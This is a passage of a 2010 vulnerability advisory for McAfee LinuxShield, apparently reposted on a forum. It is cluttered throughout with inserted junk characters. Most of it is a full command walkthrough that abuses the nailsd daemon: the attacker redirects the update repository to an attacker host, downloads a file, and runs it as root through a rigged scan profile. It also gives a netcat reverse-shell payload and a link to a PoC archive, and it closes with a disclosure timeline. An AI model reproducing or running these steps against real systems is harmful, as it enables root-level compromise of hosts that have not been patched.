    network, incorporating as many protective measures as possible.1 F% R! J  ?. P: M

    % T/ N2 {# C/ K4 i, Y7 [+ KLinuxShield uses a web-browser interface, and a large number of8 l& C. |( {& l- ]# b
    LinuxShield installations can be centrally controlled by ePolicy" [8 w8 x" F9 S) S& H# S9 S
    Orchestrator.
    - I( Y. z5 f/ s, z; ~) H; V# A& Q% C$ m; [) Y3 n1 r1 ]
    (Product description from LinuxShield Product Guide)- z* {2 ~# z, K! R/ w2 ]

    + ^; }5 t, T8 I) t* A& R$ m+ j
    / F( P8 H7 o/ d
    Description:* t; [+ y, j+ V4 J
    ============) E5 U6 y. w; u) }5 q

    : A" r, P' K5 u/ EThis vulnerability allows remote attackers to execute arbitrary code# O$ R5 {9 K9 |8 Y0 {$ {, Q/ R& {
    on vulnerable installations of McAfee LinuxShield. User interaction
    ) X5 u2 S+ [, E& \. ~+ g3 dis not required to exploit this vulnerability but an attacker must
    4 z- r, l2 u: t0 z9 ^be authenticated.
    5 E7 f1 V* y3 q, L9 z/ P$ n
    ; y$ w4 ]  v7 U# n% @The LinuxShield Webinterface communicates with the localy installed9 p1 A' W3 }# T9 w) u7 H: u, ^
    "nailsd" daemon, which listens on port 65443/tcp, to do
    % V: Y. P, U6 [- e. D7 f0 Q& hconfiguration" Y$ ~" J; y! ^2 |+ u+ q
    changes, query the configuration and execute tasks.
    7 B0 M3 @1 s+ V% E) M5 \" ^4 b7 v
    ; V/ Z9 k) `; ~( h$ [+ WEach user, which can login to the victim box, can also authenticate
    7 e7 i8 Y2 d+ M9 K+ _9 ait self to the "nailsd" and can do configuration changes and
    ) z/ n5 L( C9 E1 s$ `. hexecute
    2 M- h; l7 r. [6 i$ ~tasks with root privileges.  H. B3 I1 n/ G" K0 f1 K. a  g

    ; X8 r0 @1 r5 S; u8 [9 i6 j7 ~8 SA direct execution of commands is not possible, but it is possible to2 X) X! }: }* [# s) @
    download and execute code through manipulation of the config and9 d5 c* G7 _% p( G
    execute schedule tasks of the LinuxShield.
    0 _; x: T+ s1 m6 _. Z! ]+ |1 E4 \+ P7 }0 ~5 C( d/ B
    , f2 N8 T, _2 i, W/ h1 Q
    walk-through (after the TLS handshake):
    7 Z3 d/ G' o, U, o8 n% O: z2 D+--------------------------------------
    8 b! y& p2 N( A3 ]. N5 m6 F9 f
    nailsd > +OK welcome to the NAILS Statistics Service
      M# H6 [! p6 eattacker> auth <user> <pass>  F2 [  z5 J2 h7 s
    nailsd > +OK successful authentication
    , E5 J, P! _+ M+ `5 k( J, j3 o5 n
    # Set the Attacker repository to download our code from a httpd
    ' R+ D( y. w5 y  ~6 t/ P: A# (catalog.z)
    # Z8 A% p+ ]6 A+ f1 W! B#---------------------------------------------------------------" l9 c  y7 v) T. X! }5 c9 N' {
    attacker> db set 1 _table=repository status=1 siteList=<?xml version
    - G: g: O% i- T) a0 e+ Z="1.0" encoding="UTF-8"?><ns:SiteLists
    % M/ d' K* H8 Yxmlns:ns="naSiteLi' {6 r& I) o; \; a- K# F; |
    st" GlobalVersion="20030131003110"
    + w# o1 \& g- v, Q2 TLocalVersion="20091209+ h& ^. m5 e2 W3 s) X$ b0 ~
    161903" Type="Client"><SiteList
    $ z7 p. V. A* J% _$ q2 @: j! B0 QDefault="1" Name="SomeGU
    # f- K+ r0 W0 M& k6 e- CID"><HttpSite Type="repository"# ~- ~% _: I3 P: J# E2 Y
    Name="EvilRepo" Order="1
    ! {' n. ~/ F- H9 t6 E6 a. J" Server="<attackerhost>:80"
    ( ~) U2 `1 G4 Z0 D- A1 fEnabled="1" Local="1"><Rela, A" L( L" ]; m6 h1 d
    - y) a5 }8 Q4 t# q* e: p& M
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    9 B3 \9 l/ l5 G& F% CrName></0 U2 V3 \' t2 k* f
    UserName><Password
    ' y- C. G8 }% v0 E: ~% }Encrypted="0"/></HttpSite></SiteList></
    / b, p- \& Q8 s& Z+ Q- Jns:SiteLists> _cmd=update/ i& }+ H# r" i, `( W  m" Z  G
    nailsd > +OK database changes buffered.
    9 @9 n& C# s* c9 Y) A, B/ a2 U" V/ ^+ I  E. ~* H
    # Execute task to set the attacker repository: p! b. [* T* C, T' U
    #---------------------------------------------------------------6 a  ]6 n4 ~* {8 z
    attacker> task setsitelist3 n/ T9 v; r3 T, Z# Z* U
    nailsd > +OK setting sitelist from CMA.
    % ?" ^# r* E) I) t  U0 Y; k& M6 i
    # Execute the default Update task to download the code
    . m) K/ X$ X2 B( j4 G% w#---------------------------------------------------------------3 [2 S/ K+ I" E5 H. {- k
    attacker> task nstart LinuxShield Update
    . y3 F* Q, j8 I: S/ f) inailsd > +OK task LinuxShield Update starting
    # p0 {4 \8 n/ |4 [
    - w2 v+ w* O8 D2 b# C* c# Create a Scan profile, which executes our code. The profiles are+ f) p/ F: u# a3 H& O+ w
    # not stored in the database.5 F: p0 m$ R: T9 W
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg0 Z7 R  ~$ E5 w
    #---------------------------------------------------------------( e5 s0 B0 [" Q3 [* I! @1 N- D' H1 S
    attacker> sconf ODS_99 begin
    7 ]3 L9 U' J0 L. @% xnailsd > +OK 1260400888
    $ p* A  L2 p! \4 j6 U  h3 u3 E$ ~8 J2 O  @
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the
    * q/ A* y  l! ?6 d- r) C0 |6 e! xpath# ~6 f( {' _0 |, X( v) N/ h; ]
    # where our earlier downloaded catalog.z file is stored.
    " H: d- _# f9 z/ ~1 ^* ~# (/opt/McAfee/cma/scratch/update/catalog.z)% o% H. F3 J2 P, H/ h
    #---------------------------------------------------------------
    & K; V& H" d, Xattacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    2 j- j! _( P6 q/ Q" vtrue nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O& a4 y; o- w# P+ T6 L
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    ! u. g0 U" ^. L( ?( Z10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    , @5 x  A) y4 V6 W4 M4 P+ N- u' N1 Line/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro" V3 f; [2 s/ F2 o# q: r$ F- h+ {4 X
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    ; t( V% y" y% [" m$ X3 m* fir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en/ h6 z- q6 m, l: \2 V2 |! {8 N
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    - p6 a+ u' O+ t2 u% b- }* r.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
    ; {/ |6 D) c( TristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru" j  g( s' Q* G! z% p
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99# s5 M( m, R+ \+ R! |7 M
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    ! _' }. Q9 C, p4 K3 lle.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil$ G$ B/ o% g  F& Z2 Q3 E
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    . }5 e* c$ Y3 [& `0 Fe nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    ! d1 \, P; X6 u+ S$ ^  cofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    " `2 ^. _- Z9 [7 T3 R  ?' @. ?o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile. I0 ~( v+ A% j- j' m7 Y
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    " {# U! ~* Y% m4 x6 u* P' `/ x! C9 ^rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    ) C1 X9 P2 z# w; t3 D9 qch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    ' M. \& y$ w! {) a. `- G; K1 K00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    , W3 f$ v  k6 N. K7 }* F7 W  kODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    ! @+ v4 }$ `0 z0 z' Ater.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true4 r2 S' L2 w' `4 w  N6 s
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr( P3 {7 f4 k- q+ f/ W+ l
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil; r2 @6 A* f- l4 w
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    4 g0 ~  F& e" e.action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    # v7 j& Z9 j) p, l2 l* X& ^& ?+ ]action.App.primary=Clean nailsd.profile.ODS_99.action.App.s2 U( S5 H6 B/ V6 W! j- L! o
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa  L% V. B5 B$ o
    ss nailsd.profile.ODS_99.action.error=Block
    * Q2 l( }9 ?3 \. O5 U) {& ^# w$ tnailsd > +OK configuration changes buffered% Q2 D2 U( a. b+ N) U7 i
    attacker> sconf ODS_99 commit 12604008885 P2 p4 i; h. `& m# z7 P
    nailsd > +OK configuration changes stored% k2 A, d  ?* W+ h6 |4 e! w/ m

    ; ?5 g* W3 c- ?: Q- y5 k# Set a scan task with the manipulated profile to execute the code9 e( |+ Z% A2 z! Z
    #---------------------------------------------------------------( Z( ?! R8 I% g1 V
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
    * X, Z$ M! c* X& Z6 f1 {pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    , d* ~- y  T7 c9 ?mp;exclude:false timetable=type=unscheduled taskResults=0 i7 v* D3 g& w7 U- ^+ M
    _lastRun=1260318482 status=Stopped _cmd=insert
    * ]* Q% B9 C6 f! f9 N' C/ tnailsd > +OK database changes buffered
    0 x* h6 P: N9 U8 U6 t9 b1 r( ^- z  n- j8 m
    # Execute scan task to execute the code
    0 K2 [6 x8 V* N5 m#---------------------------------------------------------------
    9 A; k" a& K# \* X1 N* [: O! Oattacker> task nstart Evil Task9 ?7 N5 r! K& [3 z( a3 s* i( D
    : Z& `- n- R! A3 a0 Q% l
    +-------------------------------------- walk-through EOF
    / E3 @: k# n1 w! P' C6 d0 N: V; A' g7 Z- w: H! }* K0 W. N, r

    * L: c) B# y( I4 S4 FTo get a reverse root shell place something like this in the catalog.z
      y) ~1 W: E1 F
    ( a, `, R( e! E--- snip ---
    7 G9 z' X" R+ I) S5 [#!/bin/sh
    6 c& h) N$ R% [! dnc -nv <attacker_host> 4444 -e /bin/sh
    . \4 e, i8 r- m--- /snip ---9 ]3 ~( Y3 l% q' H" M  T
    " m2 o3 Z* c# s4 S: _3 q7 T

    ( n+ d9 c6 E: d6 b! c' _' c* J& m1 ^6 U5 o4 Z
    Proof of Concept :' I  \  z( {: p/ f, l" x' O
    ==================
    9 {# v  C$ H2 K" H7 d; z' ]6 {4 F2 z! O0 S% Q7 S. F2 J) n
    http://inj3ct0r.com/sploits/11165.tar.gz' M% B: m  B) `8 K* v; c% z

    ) C' g4 a; R- O+ `* L
    * m# e2 n$ Y7 T6 I* s
    3 i8 H# Z- m) {! D7 |Solution:
    , h$ G  o: n+ P- K% `1 K( q4 T=========  G0 f9 T! t& w1 d! W
    1 ?* P) L: ?. t  n/ j! l
    McAfee Advisory
    " y+ W2 Y7 w) }+ z* T0 K8 l+--------------" m5 u  p- D5 ?# u) h
    https://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007( i7 Z2 U! P* z5 v' w
    - y* l" W8 J; J" `
    ! E( [( f8 F3 Z" \; a& j) q
    , J% Q' g% L# c4 U5 R8 z
    Disclosure Timeline (YYYY/MM/DD):6 P% o" O, n: o
    =================================1 J7 l+ {! Q, X% h+ @! v- E
    1 `1 P- d+ `! B* n6 G" ]
    2009.12.07: Vulnerability found
    ) |% s% d4 i$ _" w5 o2010.02.03: Asked vendor for a PGP key6 d: D" S: Q8 n# M7 u  @, x
    2010.02.05: Vendor sent his PGP key
    ' k5 }; s3 R- `3 [2 R7 _2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure: D  C% F1 H& i( q9 E4 h
    date (2010.02.18) to Vendor; |: t6 O3 q3 y* S# M: ~
    2010.02.05: Vendor acknowledges the reception of the advisory
    5 U: \% K% f- c2010.02.16: Ask for a status update, because the planned release date is7 [# U  I- C6 ]- |$ \
    2010.02.18.5 M9 x3 o! K. U( n
    2010.02.16: Vendor response that, they are currently working on a patch
    + g4 |3 k. X* M1 ?4 k2010.02.17: Changed release date to 2010.02.25./ W: K5 R9 I9 ^0 e3 j
    2010.02.22: Vendor gives a status update, that they are able to release
    # y' D" W0 z. q& p1 Z# E0 ~the patch on 2010.02.25.8 R# o* y, B, b* N6 q/ P
    2010.02.24: Ask for a list of affected products and the advisory url.% N! z7 H3 K3 h+ `5 n& i
    2010.02.24: Vendor sends the list.
    ' h/ \; t" t$ J5 f& p2010.03.02: Release of this Advisory6 N7 u. G- I3 R3 @
    * n6 ]8 y3 f  t+ D/ {

    0 z  [9 G9 o) U+ x$ v$ p' [+ {( O( [9 x# b8 w: ~6 R' p
    3 a$ s; x: T  H* d9 C
    * K' m  M2 u  J  c& f+ z& {' G
    / r' S1 r; m1 t( r3 f! {- }; t
    9 w( F: y, ?5 j

    " ?5 ~9 F8 q- @7 p' r/ {1 h, V8 T+ Q7 n/ h

    9 Q# p+ w; }- S( m. A5 O/ `7 c9 d
    ; @' f; t7 `- i1 j! L* P0 O; u2 h2 `' @8 c3 ?

    # q& y4 f1 K% u5 W9 E% u2 d4 g  v2 r& E" E5 G8 p1 F

    " l, g9 H9 O. p% ?3 N* f, @+ x( H: Y" R7 `, M0 T. y8 ^
    + b. P$ D2 o. @: {$ z& R
    " R5 c4 Q: b- C

    . _+ `# ^* b$ G' A  v' c, b- O3 W
    7 E; S+ n8 X% _+ \& o
    ( E0 u) P) }; U) D* W! X0 S公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表